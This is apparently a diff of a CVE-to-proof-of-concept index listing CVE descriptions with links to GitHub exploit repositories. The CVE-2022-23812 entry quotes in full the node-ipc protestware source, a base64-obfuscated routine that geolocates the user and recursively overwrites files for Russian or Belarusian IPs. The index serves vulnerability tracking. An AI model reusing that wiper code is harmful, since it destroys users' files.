- [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC)
|
||||
- [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907)
|
||||
- [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907)
|
||||
- [iveresk/cve-2022-21907-http.sys](https://github.com/iveresk/cve-2022-21907-http.sys)
|
||||
|
@ -4248,13 +4190,6 @@
|
|||
|
||||
- [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984)
|
||||
|
||||
### CVE-2022-21999 (2022-02-09)
|
||||
|
||||
<code>Windows Print Spooler Elevation of Privilege Vulnerability
|
||||
</code>
|
||||
|
||||
- [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool)
|
||||
|
||||
### CVE-2022-22029 (2022-07-12)
|
||||
|
||||
<code>Windows Network File System Remote Code Execution Vulnerability
|
||||
|
@ -4284,13 +4219,6 @@
|
|||
- [pwneddr/Sonic_CVE-2022-22274_poc](https://github.com/pwneddr/Sonic_CVE-2022-22274_poc)
|
||||
- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc)
|
||||
|
||||
### CVE-2022-22296 (2022-01-24)
|
||||
|
||||
<code>Sourcecodester Hospital's Patient Records Management System 1.0 is vulnerable to Insecure Permissions via the id parameter in manage_user endpoint. Simply change the value and data of other users can be displayed.
|
||||
</code>
|
||||
|
||||
- [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296)
|
||||
|
||||
### CVE-2022-22536 (2022-02-09)
|
||||
|
||||
<code>SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
|
||||
|
@ -4371,13 +4299,6 @@
|
|||
|
||||
- [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827)
|
||||
|
||||
### CVE-2022-22828 (2022-01-27)
|
||||
|
||||
<code>An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string.
|
||||
</code>
|
||||
|
||||
- [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828)
|
||||
|
||||
### CVE-2022-22845 (2022-01-09)
|
||||
|
||||
<code>QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations.
|
||||
|
@ -4385,27 +4306,6 @@
|
|||
|
||||
- [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit)
|
||||
|
||||
### CVE-2022-22850 (2022-01-26)
|
||||
|
||||
<code>A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_types.
|
||||
</code>
|
||||
|
||||
- [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850)
|
||||
|
||||
### CVE-2022-22851 (2022-01-26)
|
||||
|
||||
<code>A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php
|
||||
</code>
|
||||
|
||||
- [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851)
|
||||
|
||||
### CVE-2022-22852 (2022-01-26)
|
||||
|
||||
<code>A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_list.
|
||||
</code>
|
||||
|
||||
- [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852)
|
||||
|
||||
### CVE-2022-22909 (2022-03-02)
|
||||
|
||||
<code>HotelDruid v3.0.3 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via an attacker inserting a crafted payload into the name field under the Create New Room module.
|
||||
|
@ -4702,8 +4602,6 @@
|
|||
<code>PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a subnet via app/admin/routing/edit-bgp-mapping-search.php
|
||||
</code>
|
||||
|
||||
- [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046)
|
||||
- [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046)
|
||||
- [hadrian3689/phpipam_1.4.4](https://github.com/hadrian3689/phpipam_1.4.4)
|
||||
- [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046)
|
||||
|
||||
|
@ -4778,7 +4676,6 @@
|
|||
</code>
|
||||
|
||||
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
|
||||
- [AlphabugX/CVE-2022-RCE](https://github.com/AlphabugX/CVE-2022-RCE)
|
||||
- [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC)
|
||||
|
||||
### CVE-2022-23342 (2022-06-21)
|
||||
|
@ -4855,13 +4752,6 @@
|
|||
- [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779)
|
||||
- [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)
|
||||
|
||||
### CVE-2022-23808 (2022-01-21)
|
||||
|
||||
<code>An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.
|
||||
</code>
|
||||
|
||||
- [dipakpanchal456/CVE-2022-23808](https://github.com/dipakpanchal456/CVE-2022-23808)
|
||||
|
||||
### CVE-2022-23812 (2022-03-16)
|
||||
|
||||
<code>This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
|
||||
|
@ -4906,9 +4796,6 @@
|
|||
|
||||
- [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940)
|
||||
|
||||
### CVE-2022-23967
|
||||
- [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967)
|
||||
|
||||
### CVE-2022-23990 (2022-01-26)
|
||||
|
||||
<code>Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.
|
||||
|
@ -33008,6 +32895,7 @@
|
|||
- [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2)
|
||||
- [cyberharsh/PHP_CVE-2012-1823](https://github.com/cyberharsh/PHP_CVE-2012-1823)
|
||||
- [theykillmeslowly/CVE-2012-1823](https://github.com/theykillmeslowly/CVE-2012-1823)
|
||||
- [0xl0k1/CVE-2012-1823](https://github.com/0xl0k1/CVE-2012-1823)
|
||||
|
||||
### CVE-2012-1870 (2012-07-10)
|
||||
|
||||
|
|
Loading…
Reference in a new issue